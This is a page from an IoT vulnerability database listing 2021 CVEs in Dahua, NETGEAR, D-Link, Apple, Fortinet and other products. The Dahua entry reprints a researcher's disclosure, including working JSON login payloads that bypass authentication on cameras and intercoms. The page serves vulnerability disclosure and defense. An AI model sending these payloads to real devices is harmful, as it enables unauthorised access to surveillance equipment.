VARIoT IoT vulnerabilities database

VAR-202109-1874 | CVE-2021-33045 | Authentication vulnerabilities in multiple Dahua products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. Multiple Dahua products contain authentication vulnerabilities. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Dahua IPC is a series of industrial computers from the Chinese company Dahua. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider.
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (2021)
Limited Disclosure: September 6, 2021
Full Disclosure: October 6, 2021
PoC: https://github.com/mcw0/DahuaConsole
-=[Dahua]=-
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware
-=[Timeline]=-
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)
June 17, 2021: Sent reminder to Dahua PSIRT
June 18, 2021: Asked IPVM for help to get in contact with Dahua
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details
June 19, 2021: Additional details including PoC sent
June 21, 2021: ACK received, vulnerabilities confirmed
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"
July 04, 2021: Confirmed "coordinated disclosure", once again
July 05, 2021: Dahua PSIRT tried to convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021.
"Full Disclosure" will be October 6, 2021,
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note
August 30, 2021: Sent my "Limited Disclosure" note
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices
September 2, 2021: Dahua PSIRT pointed to overseas website, asked for what models I have so Dahua could release firmware
September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches
September 6, 2021: Limited Disclosure
October 6, 2021: Full Disclosure
-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability:
"clientType": "NetKeyboard",
Vulnerable device types: IPC/VTH/VTO (tested)
Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021)
Protocol: DHIP and HTTP/HTTPS
Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}
[Example]
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "loginType": "Direct",
        "clientType": "NetKeyboard",
        "authorityType": "Default",
        "passwordType": "Default",
        "password": "Not Used"
    },
    "id": 1,
    "session": 0
}
-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability:
"ipAddr": "127.0.0.1",
"loginType": "Loopback",
"clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)
Vulnerable Firmware: Firmware version older than beginning/mid 2020.
Protocol: DHIP
Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}
[Example]
Random MD5 with l/p: admin/admin
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",
        "authorityType": "Default",
        "passwordType": "Default",
        "password": "[REDACTED]"
    },
    "id": 1,
    "session": 0
}
Plain text with l/p: admin/admin
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",
        "authorityType": "Default",
        "passwordType": "Plain",
        "password": "admin"
    },
    "id": 1,
    "session": 0
}
VAR-202109-1875 | CVE-2021-33044 | Authentication vulnerabilities in multiple Dahua products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. Multiple Dahua products contain authentication vulnerabilities. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Multiple products offered by Dahua Technology contain an authentication vulnerability (CWE-287). In this vulnerability information, the impact on DHI-ASI7213Y-V3-T1 was reported to IPA under the Information Security Early Warning Partnership, and JPCERT/CC coordinated with the developer. Reporter: Mitsui Bussan Secure Direction Co., Ltd. A remote third party can exploit the product by sending a specially crafted data packet, and ID authentication may be bypassed. Dahua IPC is a series of industrial computers from the Chinese company Dahua. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider.
VAR-202109-1067 | CVE-2021-40867 | Authentication vulnerability in multiple NETGEAR smart switches |
CVSS V2: 5.4 CVSS V3: 7.1 Severity: HIGH |
Certain NETGEAR smart switches are affected by an authentication hijacking race-condition vulnerability by an unauthenticated attacker who uses the same source IP address as an admin in the process of logging in (e.g., behind the same NAT device, or already in possession of a foothold on an admin's machine). This occurs because the multi-step HTTP authentication process is effectively tied only to the source IP address. This affects GC108P before 1.0.8.2, GC108PP before 1.0.8.2, GS108Tv3 before 7.0.7.2, GS110TPP before 7.0.7.2, GS110TPv3 before 7.0.7.2, GS110TUP before 1.0.5.3, GS308T before 1.0.3.2, GS310TP before 1.0.3.2, GS710TUP before 1.0.5.3, GS716TP before 1.0.4.2, GS716TPP before 1.0.4.2, GS724TPP before 2.0.6.3, GS724TPv2 before 2.0.6.3, GS728TPPv2 before 6.0.8.2, GS728TPv2 before 6.0.8.2, GS750E before 1.0.1.10, GS752TPP before 6.0.8.2, GS752TPv2 before 6.0.8.2, MS510TXM before 1.0.4.2, and MS510TXUP before 1.0.4.2. Multiple NETGEAR smart switches contain an authentication vulnerability and a race condition vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
VAR-202109-1066 | CVE-2021-40866 | Authentication vulnerability in multiple NETGEAR smart switches |
CVSS V2: 5.4 CVSS V3: 8.8 Severity: HIGH |
Certain NETGEAR smart switches are affected by a remote admin password change by an unauthenticated attacker via the (disabled by default) /sqfs/bin/sccd daemon, which fails to check authentication when the authentication TLV is missing from a received NSDP packet. This affects GC108P before 1.0.8.2, GC108PP before 1.0.8.2, GS108Tv3 before 7.0.7.2, GS110TPP before 7.0.7.2, GS110TPv3 before 7.0.7.2, GS110TUP before 1.0.5.3, GS308T before 1.0.3.2, GS310TP before 1.0.3.2, GS710TUP before 1.0.5.3, GS716TP before 1.0.4.2, GS716TPP before 1.0.4.2, GS724TPP before 2.0.6.3, GS724TPv2 before 2.0.6.3, GS728TPPv2 before 6.0.8.2, GS728TPv2 before 6.0.8.2, GS750E before 1.0.1.10, GS752TPP before 6.0.8.2, GS752TPv2 before 6.0.8.2, MS510TXM before 1.0.4.2, and MS510TXUP before 1.0.4.2. Multiple NETGEAR smart switches contain an authentication vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). GC108P and the other listed models are smart switch products from the American company NETGEAR.
VAR-202109-0904 | CVE-2021-38341 | Cross-site scripting vulnerability in the WooCommerce Payment Gateway Per Category plugin for WordPress |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
The WooCommerce Payment Gateway Per Category WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/includes/plugin_settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.10. WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. A WordPress plugin is an open source application plugin for WordPress.
VAR-202109-1695 | CVE-2021-40284 | Classic buffer overflow vulnerability in D-Link DSL-3782 |
CVSS V2: 6.8 CVSS V3: 6.5 Severity: MEDIUM |
D-Link DSL-3782 EU v1.01:EU v1.03 is affected by a buffer overflow which can cause a denial of service. This vulnerability exists in the web interface "/cgi-bin/New_GUI/Igmp.asp". Authenticated remote attackers can trigger this vulnerability by sending a long string in parameter 'igmpsnoopEnable' via an HTTP request. D-Link DSL-3782 contains a classic buffer overflow vulnerability. Service operation may be interrupted (DoS). D-Link DSL-3782 is a wireless router made by D-Link in Taiwan. The vulnerability is caused by a failure to correctly verify data boundaries when performing memory operations in the web interface /cgi-bin/New_GUI/Igmp.asp.
VAR-202109-0545 | CVE-2021-25449 | Buffer error vulnerability in Android |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An improper input validation vulnerability in libsapeextractor library prior to SMR Sep-2021 Release 1 allows attackers to execute arbitrary code in mediaextractor process. Android contains a buffer error vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Samsung libsapeextractor is a component of Samsung mobile devices. Samsung libsapeextractor has an input validation error vulnerability, which is caused by incorrect input validation logic in the libsapeextractor library.
VAR-202109-0326 | CVE-2021-1863 | Authentication vulnerability in iOS and iPadOS |
CVSS V2: 2.1 CVSS V3: 2.4 Severity: LOW |
An issue existed with authenticating the action triggered by an NFC tag. The issue was addressed with improved action authentication. This issue is fixed in iOS 14.5 and iPadOS 14.5. A person with physical access to an iOS device may be able to place phone calls to any phone number. iOS and iPadOS contain an authentication vulnerability. Information may be tampered with.
VAR-202109-1314 | CVE-2021-30664 | Out-of-bounds write vulnerabilities in multiple Apple products |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing a maliciously crafted file may lead to arbitrary code execution. Multiple Apple products contain a vulnerability related to out-of-bounds writes. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
VAR-202109-0325 | CVE-2021-1862 | Apple iOS and Apple iPadOS Authorization problem vulnerability |
CVSS V2: 2.1 CVSS V3: 2.4 Severity: LOW |
Description: A person with physical access may be able to access contacts. This issue is fixed in iOS 14.5 and iPadOS 14.5. Impact: An issue with Siri search access to information was addressed with improved logic
VAR-202112-0670 | CVE-2021-36169 | Vulnerability in Fortinet FortiOS |
CVSS V2: 6.6 CVSS V3: 6.0 Severity: MEDIUM |
A Hidden Functionality in Fortinet FortiOS 7.x before 7.0.1, FortiOS 6.4.x before 6.4.7 allows an attacker to execute unauthorized code or commands via specific hex read/write operations. Fortinet FortiOS contains an unspecified vulnerability. Information may be obtained and tampered with. Fortinet FortiOS is a security operating system dedicated to the FortiGate network security platform developed by Fortinet. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSLVPN, Web content filtering and anti-spam. Fortinet FortiOS has a security vulnerability in which the FortiOS CLI could allow local and authenticated users assigned to specific VDOMs to retrieve information from other VDOMs. An attacker could exploit this vulnerability to expose sensitive information to unauthorized actors.
VAR-202109-0170 | CVE-2020-27940 | Vulnerability in the Apple TV application for Fire OS |
CVSS V2: 4.0 CVSS V3: 4.3 Severity: MEDIUM |
This issue was addressed with improved file handling. This issue is fixed in Apple TV app for Fire OS 6.1.0.6A142:7.1.0. An attacker with file system access may modify scripts used by the app
VAR-202109-0061 | CVE-2020-24672 | Input validation vulnerability in Base Software |
CVSS V2: 6.8 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in Base Software for SoftControl allows an attacker to insert and run arbitrary code in a computer running the affected product. This issue affects: . Base Software contains an input validation vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). ABB Base Software is a basic software product of the Swiss company ABB.
VAR-202109-0347 | CVE-2021-1833 | Vulnerability in iOS and iPadOS |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
This issue was addressed with improved checks. This issue is fixed in iOS 14.5 and iPadOS 14.5. An application may be able to gain elevated privileges. iOS and iPadOS contain an unspecified vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
VAR-202109-0501 | CVE-2021-36179 | Out-of-bounds write vulnerability in Fortinet FortiWeb |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A stack-based buffer overflow in Fortinet FortiWeb version 6.3.14 and below, 6.2.4 and below allows an attacker to execute unauthorized code or commands via crafted parameters in CLI command execution. Fortinet FortiWeb contains an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content. FortiWeb has a buffer error vulnerability that stems from multiple stack-based buffer overflow vulnerabilities in the FortiWeb CLI interface.
VAR-202109-0502 | CVE-2021-36182 | OS command injection vulnerability in Fortinet FortiWeb |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
An improper neutralization of special elements used in a command ('Command Injection') in Fortinet FortiWeb version 6.3.13 and below allows an attacker to execute unauthorized code or commands via crafted HTTP requests. Fortinet FortiWeb contains an OS command injection vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content. FortiWeb has a buffer error vulnerability that stems from multiple stack-based buffer overflow vulnerabilities in the FortiWeb CLI interface.
VAR-202109-1361 | CVE-2021-30750 | Vulnerability regarding improper default permissions in macOS |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
The issue was addressed with improved permissions logic. This issue is fixed in macOS Big Sur 11.3. A malicious application may be able to access the user's recent contacts. macOS contains a vulnerability regarding improper default permissions. Information may be obtained.
VAR-202109-1362 | CVE-2021-30751 | Vulnerability in macOS |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.4. A malicious application may be able to bypass certain Privacy preferences. macOS contains an unspecified vulnerability. Information may be tampered with.
VAR-202109-0287 | CVE-2021-1770 | Buffer error vulnerability in multiple Apple products |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A buffer overflow may result in arbitrary code execution. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. A logic issue was addressed with improved state management. Multiple Apple products contain a buffer error vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). macOS Big Sur versions prior to 11.3, iOS versions prior to 14.5 and iPadOS versions prior to 14.5, watchOS versions prior to 7.4, and tvOS versions prior to 14.5 have a security vulnerability due to a buffer overflow that may lead to arbitrary code execution.
VAR-202109-0278 | CVE-2021-1812 | Vulnerability in iOS and iPadOS |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
A logic issue was addressed with improved validation. This issue is fixed in iOS 14.5 and iPadOS 14.5. A malicious application may be able to execute arbitrary code with system privileges. iOS and iPadOS contain an unspecified vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Both Apple iOS and Apple iPadOS are products of Apple. Apple iOS is an operating system developed for mobile devices. Apple iPadOS is an operating system for iPad tablets.